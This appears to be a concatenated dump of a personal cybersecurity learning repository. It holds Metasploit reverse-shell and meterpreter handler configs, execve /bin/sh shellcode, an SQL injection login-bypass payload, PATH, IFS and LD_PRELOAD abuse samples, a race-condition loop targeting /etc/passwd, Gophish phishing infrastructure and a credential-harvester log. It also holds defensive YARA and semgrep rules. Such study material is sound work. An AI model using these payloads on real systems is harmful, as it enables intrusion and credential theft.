-------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Files/simplenote -------------------------------------------------------------------------------- /Misc/DFIR-Tools/config.ini: -------------------------------------------------------------------------------- 1 | [ip_quality_score] 2 | api_key = None 3 | 4 | [threat_intelligence_platform] 5 | api_key = None 6 | 7 | [virus_total] 8 | api_key = None -------------------------------------------------------------------------------- /Phishing/Gophish/igw.tf: -------------------------------------------------------------------------------- 1 | resource "aws_internet_gateway" "igw" { 2 | vpc_id = "${aws_vpc.gophish_vpc.id}" 3 | tags = { 4 | Name = "gophish-igw" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Defense/Forensics/Python/README.md: -------------------------------------------------------------------------------- 1 | # Python Forensics 2 | 3 | This directory contains Python scripts that may be useful to your digital 4 | forensics investigation 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x64_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/x64/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Misc/PortScanner/portScanner_manjaro_screen_capture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/PortScanner/portScanner_manjaro_screen_capture.png -------------------------------------------------------------------------------- /OffensiveGo/README.md: 
-------------------------------------------------------------------------------- 1 | # HackingWithGolang 2 | 3 | This directory contains code written while reading "**Black Hat Go**" by Tom Steele, Chris Patten, and Dan Kottmann. 4 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/README.md: -------------------------------------------------------------------------------- 1 | # PortSwigger Web Security Academy 2 | 3 | This folder will be dedicated to solutions for labs found in PortSwigger's Web Security Academy. 4 | -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x64_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x64/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x86_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x86/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x86_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/notesearch_env_exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/notesearch_env_exploit 
-------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x64_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/x64/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/sample.txt.encrypted: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/sample.txt.encrypted -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/stack_ex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/MemorySegmentation/stack_ex -------------------------------------------------------------------------------- /APIProjects/GitHub/README.md: -------------------------------------------------------------------------------- 1 | ### Creating a GitHub Personal Access Token 2 | https://docs.github.com/en/free-pro-team@latest/github/authenticating-to-github/creating-a-personal-access-token 3 | -------------------------------------------------------------------------------- /Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography 2 | Deep dive into Cryptography with Python3 and a little bit of C# 3 | 4 | "Practical Cryptography in Python: Learning Correct Cryptography by Example" 5 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Files/uid.c: -------------------------------------------------------------------------------- 1 
| #include 2 | 3 | int main() 4 | { 5 | printf("uid: %d\n", getuid()); 6 | printf("Effective uid: %d\n", geteuid()); 7 | } 8 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/README.md: -------------------------------------------------------------------------------- 1 | # Server Side Attacks 2 | 3 | This directory contains all of the server side attack paths found in the PortSwigger Web Security Academy labs. 4 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.3.java.solution.txt: -------------------------------------------------------------------------------- 1 | You guessed it, it's XXE! No validation of the XML document being parsed - no external entities protections, no DTDs protections, etc 2 | -------------------------------------------------------------------------------- /APIProjects/Twitter/CyberCrawler/api.json: -------------------------------------------------------------------------------- 1 | { 2 | "consumer_key": "None", 3 | "consumer_secret": "None", 4 | "access_token_key": "None", 5 | "access_token_secret": "None" 6 | } 7 | -------------------------------------------------------------------------------- /MyTools/RedTeam/massbuster/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "gobuster": "--follow-redirect --status-codes-blacklist 404 -q --no-error --random-agent", 3 | "httpx": "-silent -random-agent -no-color" 4 | } 5 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/README.md: -------------------------------------------------------------------------------- 1 | # Client Side Attacks 2 | 3 | This directory contains all of the client side attack paths found in the PortSwigger Web Security Academy labs. 
4 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/memory_segments: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/MemorySegmentation/memory_segments -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/using_the_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/MemorySegmentation/using_the_heap -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/utils/prog_args.py: -------------------------------------------------------------------------------- 1 | from argparse import ArgumentParser 2 | 3 | def prog_args(): 4 | parser = ArgumentParser() 5 | 6 | return parser.parse_args() 7 | 8 | -------------------------------------------------------------------------------- /Misc/DFIR-Tools/README.md: -------------------------------------------------------------------------------- 1 | # Response-Tools 2 | Digital Forensics and Incident response tools 3 | 4 | ### Installed Python Dependencies 5 | 6 | ``` 7 | python3 -m pip install -r requirements.txt 8 | ``` 9 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/Flaticon.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/Flaticon.eot -------------------------------------------------------------------------------- /OffensiveGo/ShellcodeExecution/ViaSyscall/go.sum: 
-------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.1.0 h1:kunALQeHf1/185U1i0GOB/fy1IPRDDpuoOOqRReG57U= 2 | golang.org/x/sys v0.1.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 3 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow2 -------------------------------------------------------------------------------- /Misc/fix-ssh-key.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | SSH_FILE=$1 3 | sed -e "s/-----BEGIN OPENSSH PRIVATE KEY-----/&\n/"\ 4 | -e "s/-----END OPENSSH PRIVATE KEY-----/\n&/"\ 5 | -e "s/\S\{64\}/&\n/g"\ 6 | $SSH_FILE 7 | -------------------------------------------------------------------------------- /Phishing/Gophish/associations.tf: -------------------------------------------------------------------------------- 1 | resource "aws_route_table_association" "rt_associations" { 2 | subnet_id = "${aws_subnet.public_subnet.id}" 3 | route_table_id = "${aws_route_table.public_rtb.id}" 4 | } 5 | -------------------------------------------------------------------------------- /DockerStuff/MalwareAnalysis/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | services: 3 | 
cyberchef: 4 | build: 5 | context: ./ 6 | dockerfile: cyberchef.dockerfile 7 | ports: 8 | - "7373:8000" 9 | -------------------------------------------------------------------------------- /OffensiveGo/DNS/DNSExfiltration/go.mod: -------------------------------------------------------------------------------- 1 | module dns_exfiltration 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/alexflint/go-arg v1.4.3 // indirect 7 | github.com/alexflint/go-scalar v1.1.0 // indirect 8 | ) 9 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.dll -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.exe -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.pdb -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.dll -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.exe -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.pdb -------------------------------------------------------------------------------- /Phishing/Gophish/vpc.tf: -------------------------------------------------------------------------------- 1 | resource "aws_vpc" "gophish_vpc" { 2 | cidr_block = "${var.vpc_cidr}" 3 | enable_dns_support = true 4 | enable_dns_hostnames = true 5 | tags = { 6 | Name = "gophish-vpc" 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/get_env.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char *argv[]) 5 | { 6 | printf("%s is at %p\n", argv[1], getenv(argv[1])); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /MyTools/RedTeam/wgetexec/README.md: -------------------------------------------------------------------------------- 1 | # wgetexec 2 | 3 | Downloads a Bash or PowerShell script hosted at a URL and executes it without writing to disk. 
4 | 5 | ### Usage 6 | ``` 7 | wgetexec -url [URL] 8 | ``` 9 | 10 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/README.md: -------------------------------------------------------------------------------- 1 | # Pyphish 2 | 3 | A command-line tool using the Gophish API to create large scale phishing campaigns. 4 | 5 | # For using on Kali 6 | 7 | ```bash 8 | sudo apt install mailutils 9 | ``` 10 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.4.py: -------------------------------------------------------------------------------- 1 | @app.route('/internal-dashboard/users', methods=['GET']) 2 | def showUsers(): 3 | users = db.getAllUsers() 4 | return render_template("dashboard/users.html", users=users) 5 | 6 | -------------------------------------------------------------------------------- /SecureCodeReview/semgrep/example-rule2.yml: -------------------------------------------------------------------------------- 1 | id: python-no-prints-in-prod 2 | pattern: oldp($X) 3 | message: Use logging.debug() instead of old_print() 4 | severity: INFO 5 | fix: logging.debug($X) 6 | languages: 7 | - python 8 | -------------------------------------------------------------------------------- /Cryptography/MsgIntegritySignaturesCertificates/hmac.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import hashes, hmac 2 | from cryptography.hazmat.backends import default_backend 3 | 4 | 5 | if __name__ == "__main__": 6 | pass 7 | -------------------------------------------------------------------------------- /Phishing/Gophish/routes.tf: -------------------------------------------------------------------------------- 1 | resource "aws_route_table" "public_rtb" { 2 | vpc_id = "${aws_vpc.gophish_vpc.id}" 3 | route { 4 | cidr_block = "0.0.0.0/0" 5 | gateway_id = 
"${aws_internet_gateway.igw.id}" 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/rubberDucky/scripts/README.md: -------------------------------------------------------------------------------- 1 | # Rubber-Ducky-Scripts 2 | This repo is dedicated to rubber ducky scripts, both malicious and benevolent. 3 | ### Compile Script 4 | `java -jar duckencoder.jar -i [name_of_payload]` 5 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.assets.cache -------------------------------------------------------------------------------- /Misc/BashCyOps/OS/detect-os.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | if type -t move &>/dev/null 3 | then 4 | printf "Windows\n" 5 | elif type -t scutil &>/dev/null 6 | then 7 | printf "MAC OS\n" 8 | else 9 | printf "Linux\n" 10 | fi 11 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/logging.php: -------------------------------------------------------------------------------- 1 | filename, $this->username, FILE_APPEND); 8 | } 9 | } 10 | 11 | ?> 12 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/public_files/roundcube_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/public_files/roundcube_logo.png 
-------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/utils/db.py: -------------------------------------------------------------------------------- 1 | from tinydb import TinyDB 2 | 3 | 4 | # TODO: create a class from handling emails and stuff 5 | # from a tinydb database, and dont forget to add a 6 | # command and add it to the autocompletion word list 7 | -------------------------------------------------------------------------------- /Phishing/Gophish/key_pair.tf: -------------------------------------------------------------------------------- 1 | # NOTE: run the command: `ssh-keygen -f id_rsa` to generate private and public SSH keys 2 | resource "aws_key_pair" "gophish_ssh_key" { 3 | key_name = "gophish-ssh-key" 4 | public_key = "${file("id_rsa.pub")}" 5 | } 6 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/CSharpAES.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.csprojAssemblyReference.cache 
-------------------------------------------------------------------------------- /SecureCodeReview/semgrep/example-rule1.yml: -------------------------------------------------------------------------------- 1 | rules: 2 | - id: is-comparison 3 | languages: 4 | - python 5 | message: The operator 'is' is for reference equality, not value equality! Use 6 | `==` instead! 7 | pattern: $SOMEVAR is "..." 8 | severity: ERROR 9 | -------------------------------------------------------------------------------- /C2Routing/caddy/webdav_server/Caddyfile: -------------------------------------------------------------------------------- 1 | # Caddy webdav server basic example 2 | { 3 | admin off 4 | } 5 | 6 | :8000 { 7 | route { 8 | rewrite /dav /dav/ 9 | webdav /dav/* { 10 | prefix /dav 11 | } 12 | } 13 | file_server browse 14 | } 15 | -------------------------------------------------------------------------------- /SecureCodeReview/semgrep/README.md: -------------------------------------------------------------------------------- 1 | # Semgrep: Static Code Analysis 2 | 3 | ### Installation 4 | 5 | ```console 6 | brew install semgrep 7 | python3 -m pip install semgrep 8 | docker run --rm -v "${PWD}:/src" returntocorp/semgrep semgrep --config=auto 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Netflix/creds.txt: -------------------------------------------------------------------------------- 1 | Time: 2021-01-13 13:42:55.072118839 -0500 EST m=+106.591806301, Username: admin, Password: admin 2 | Time: 2021-01-13 13:44:15.821515227 -0500 EST m=+187.341202699, Username: johnwick@continental.com, Password: babayaga 3 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/README.md: -------------------------------------------------------------------------------- 1 | # Malware written in Python 2 | 3 | **DISCLAIMER**: The scripts in 
this directory have not been created with malicious intent but instead for educational purposes. Please do not use any of these scripts to harm someone else's computer system. 4 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\rodri\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\rodri\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/IfsAndPathSystemFunctionAbuse.c: -------------------------------------------------------------------------------- 1 | #include 2 | // providing the absolute path to `system` function can still 3 | // be abused by altering both the PATH and IFS environment 4 | // variables 5 | int main() { 6 | system("/usr/bin/cal"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /Phishing/Gophish/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_version = "~> 1.0.5" 3 | required_providers { 4 | aws = { 5 | source = "hashicorp/aws" 6 | version = ">= 3.60" 7 | } 8 | } 9 | } 10 | 11 | provider "aws" { 12 | region = "us-east-1" 13 | profile = "gophish" 14 | } 15 | -------------------------------------------------------------------------------- /OffensiveGo/SliverStager/go.mod: -------------------------------------------------------------------------------- 1 | module sliver_stager 2 | 3 | go 1.17 4 | 5 | require github.com/Binject/go-donut v0.0.0-20210701074227-67a31e2d883e 6 | 7 | require ( 8 | github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf // indirect 9 | github.com/google/uuid v1.2.0 // indirect 10 | ) 11 | 
-------------------------------------------------------------------------------- /SLAE/compile.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo '[+] Assemblying file with Nasm...' 4 | nasm -f elf32 -o $1.o $1.nasm 5 | echo '[+] Successfuly assembled file...' 6 | 7 | echo '[+] Beginning the linking process...' 8 | ld -m elf_i386 -o $1 $1.o 9 | echo '[+] Successfully linked all file references...' 10 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/.NETCoreApp,Version=v3.1.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETCoreApp,Version=v3.1", FrameworkDisplayName = "")] 5 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/PathSystemFunctionAbuse.c: -------------------------------------------------------------------------------- 1 | #include 2 | // overwriting the PATH variable will allow the attacker to perform 3 | // search order hijacking attack and replace the "cal" program that 4 | // would normally run 5 | int main() { 6 | system("cal"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /NucleiTemplates/nuclei.yaml.tmpl: -------------------------------------------------------------------------------- 1 | id: 2 | 3 | info: 4 | name: 5 | author: bin3xish477 6 | severity: 7 | description: 8 | reference: 9 | - "" 10 | 11 | requests: 12 | - method: GET 13 | path: "{{BaseURL}}" 14 | matchers: 15 | - type: 16 | extractors: 17 | - type: 18 | -------------------------------------------------------------------------------- /OffensiveGo/ProcessInjection/SliverStager/color.go: 
-------------------------------------------------------------------------------- 1 | package main 2 | 3 | const ( 4 | red = "\u001b[31m" 5 | green = "\u001b[32m" 6 | blue = "\u001b[34m" 7 | yellow = "\u001b[33m" 8 | purple = "\u001b[35m" 9 | end = "\u001b[0m" 10 | bold = "\u001b[1m" 11 | underL = "\u001b[4m" 12 | ) 13 | -------------------------------------------------------------------------------- /Phishing/Gophish/subnets.tf: -------------------------------------------------------------------------------- 1 | resource "aws_subnet" "public_subnet" { 2 | vpc_id = "${aws_vpc.gophish_vpc.id}" 3 | cidr_block = "${var.public_subnet_cidr}" 4 | map_public_ip_on_launch = true 5 | availability_zone = "${var.az}" 6 | tags = { 7 | Name = "public-subnet-67354a08" 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && \ 4 | apt -y upgrade && \ 5 | apt install -y python3 && \ 6 | apt install -y python3-pip 7 | 8 | RUN mkdir -p /opt/Pyphish 9 | 10 | COPY . 
/opt/Pyphish/ 11 | 12 | RUN pip3 install -r /opt/Pyphish/requirements.txt 13 | 14 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/AbusingLdPreload.c: -------------------------------------------------------------------------------- 1 | #include 2 | // altering the LD_PRELOAD environment variable will 3 | // allow an attacker to change the libraries loaded 4 | // by a program using external libraries 5 | int main() { 6 | printf("Hello World!"); 7 | sleep(2); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /Phishing/Gophish/outputs.tf: -------------------------------------------------------------------------------- 1 | output "instance_id" { 2 | description = "ID of the EC2 instance" 3 | value = aws_instance.gophish_instance.id 4 | } 5 | 6 | output "instance_public_ip" { 7 | description = "Public IP address of the EC2 instance" 8 | value = aws_instance.gophish_instance.public_ip 9 | } 10 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab2/README.md: -------------------------------------------------------------------------------- 1 | # Subverting Application Logic 2 | 3 | ### Objective 4 | 5 | - Bypass the login functionality using SQL Injection 6 | - Login as the **Administrator** user 7 | 8 | ### Solution 9 | 10 | ``` 11 | username: Administrator' -- - 12 | password: pass 13 | ``` 14 | -------------------------------------------------------------------------------- /Burp/CustomActions/SendUnauthenticatedRequest.java: -------------------------------------------------------------------------------- 1 | var unauthedReq = requestResponse.request().withRemovedHeader("Authorization").withRemovedHeader("Cookie"); 2 | var statusCode = api().http().sendRequest(unauthedReq).response().statusCode(); 3 | logging().logToOutput(String.format("Unauthenticated Request 
Status Code: %s", statusCode)); 4 | -------------------------------------------------------------------------------- /MicrosoftAttacks/MSHTA/payload.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Misc/RaceConditions/check_success.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | CHECK_FILE="ls -l /etc/passwd" 4 | OLD=$($CHECK_FILE) 5 | NEW=$($CHECK_FILE) 6 | 7 | while [[ "$OLD" == "$NEW" ]] 8 | do 9 | ./vulnerableRaceConditionProgram.c < passwd_input 10 | NEW=$($CHECK_FILE) 11 | done 12 | 13 | echo "/etc/passwd file has been altared!" 14 | -------------------------------------------------------------------------------- /Misc/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | const char code[] = 4 | "\x31\xc0\x50\x68//sh\x68/bin" 5 | "\x89\xe3\x50\x53\x89\xe1\x99" 6 | "\xb0\x0b\xcd\x80"; 7 | 8 | int 9 | main(int args, char **argv) 10 | { 11 | char buffer[sizeof(code)]; 12 | strcpy(buffer, code); 13 | ((void(*)())buffer)(); 14 | } 15 | -------------------------------------------------------------------------------- /OffensiveGo/ProcessInjection/SliverStager/go.mod: -------------------------------------------------------------------------------- 1 | module proc-injection 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/alexflint/go-arg v1.4.3 // indirect 7 | github.com/alexflint/go-scalar v1.1.0 // indirect 8 | github.com/mitchellh/go-ps v1.0.0 // indirect 9 | golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9 // indirect 10 | ) 11 | -------------------------------------------------------------------------------- /Misc/BufferOverflow/VulnServer/ex.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | from subprocess import run, 
PIPE 3 | 4 | pattern_size=100 5 | 6 | msf_pattern=run( 7 | ['msf-pattern_create', '-l', str(pattern_size)], 8 | stdout=PIPE, stderr=PIPE 9 | ) 10 | 11 | msf_pattern=str(msf_pattern.stdout)[2:-1].rstrip("\\n") 12 | 13 | print(msf_pattern) 14 | -------------------------------------------------------------------------------- /Cryptography/AsymmetricEncryption/get_rsa_prime_numbers.py: -------------------------------------------------------------------------------- 1 | from rsa import RSA 2 | 3 | if __name__ == "__main__": 4 | manager = RSA(public_exponent=65537, key_size=2048) 5 | print(f"n = {manager.public_key.public_numbers().n}") 6 | print(f"e = {manager.public_key.public_numbers().e}") 7 | print(f"d = {manager.private_key.private_numbers().d}") 8 | -------------------------------------------------------------------------------- /MicrosoftAttacks/MSBuild/TaskTemplate.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using Microsoft.Build.Framework; 4 | using Microsoft.Build.Utilities; 5 | 6 | namespace MyTasks 7 | { 8 | public class EvilTask : Task 9 | { 10 | public override bool Execute() 11 | { 12 | Process.Start("calc.exe"); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /Misc/YARA/DetectExeWithIP.yar: -------------------------------------------------------------------------------- 1 | rule DetectExe 2 | { 3 | meta: 4 | description = "This Yara rule simply detects an exe file using 'magic byte' identification" 5 | author = "Alexis Rodriguez" 6 | date = "2020-10-12" 7 | 8 | strings: 9 | $exe_magic_bytes = {4D 5A} 10 | 11 | condition: 12 | $exe_magic_bytes at 0 13 | } 14 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/switch-case.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local str: 
string = "write a switch to count vowels!"; 4 | local cnt: count = 0; 5 | 6 | for (c in str) 7 | { 8 | switch (c) 9 | { 10 | case "a", "e", "i", "o", "u": 11 | cnt += 1; 12 | break; 13 | } 14 | } 15 | print fmt("Number of vowels: %s", cnt); 16 | } 17 | -------------------------------------------------------------------------------- /MicrosoftAttacks/CSharp/powershell.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management.Automation; 3 | namespace Powershell 4 | { 5 | class Program 6 | { 7 | static void Main(string[] args) 8 | { 9 | PowerShell ps = PowerShell.Create(); 10 | ps.AddCommand("Invoke-Expression"); 11 | ps.AddArgument(""); 12 | ps.Invoke(); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.2.java.solution.txt: -------------------------------------------------------------------------------- 1 | This one is hard because one must be familiar with Java programming to quickly identify the vulnerability. The vulnerability lies in the use of the `java.util.Random` class instead of the `java.security.SecureRandom` class. The session identifiers generated by the `Random` class are weak and allow an attacker to predict future session IDs. 
2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/CSharpAES.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/stack_ex.c: -------------------------------------------------------------------------------- 1 | void test_func(int a, int b, int c, int d) 2 | { 3 | int flag; 4 | char buffer[0]; 5 | 6 | flag=31337; 7 | buffer[0]='A'; 8 | } 9 | 10 | int main() { 11 | test_func(1,2,3,4); 12 | } 13 | 14 | /* 15 | Compile with: 16 | gcc -g -o stack_ex stack_ex.c 17 | 18 | for gdb debugger 19 | */ 20 | -------------------------------------------------------------------------------- /Misc/ReturnToLibc/find_bin_bash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | // export MYSELL="/bin/bash" 7 | char *shell = (char *)getenv("MYSHELL"); 8 | 9 | if (shell) 10 | { 11 | printf("\tValue:\t%s\n", shell); 12 | printf("\tAddress: %x\n", (unsigned int)shell); 13 | } 14 | 15 | return 1; 16 | } 17 | -------------------------------------------------------------------------------- /Misc/icmp_redirect_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from scapy.all import * 4 | 5 | ip = IP(src="192.168.33.30", 